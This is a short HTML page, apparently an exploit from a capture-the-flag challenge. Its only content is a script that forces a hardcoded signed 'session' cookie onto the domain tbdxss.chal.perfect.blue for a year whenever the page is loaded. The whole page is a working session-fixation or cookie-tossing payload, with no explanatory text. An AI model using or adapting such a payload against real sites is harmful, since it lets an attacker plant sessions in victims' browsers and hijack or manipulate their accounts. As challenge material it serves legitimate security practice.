<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>

<script type="text/javascript">
    var cookieName = 'session';
    var cookieValue = '.eJyrVsrLL0lVslKyKU4uyiwosVNISy1JztBQzygpKSi20tdPKU5LLE4rToEivaLUwtLU4pLkRKCq1CK95PxcfXVNawUbfah-pVoA3FgdiA.YWDotg.VTWLXJZ0HGDZU0d7-sCwdDPnh7g';
    var myDate = new Date();
    myDate.setMonth(myDate.getMonth() + 12);
    document.cookie = cookieName + "=" + cookieValue + ";expires=" + myDate
        + ";domain=tbdxss.chal.perfect.blue;path=/";
</script>

</body>
</html>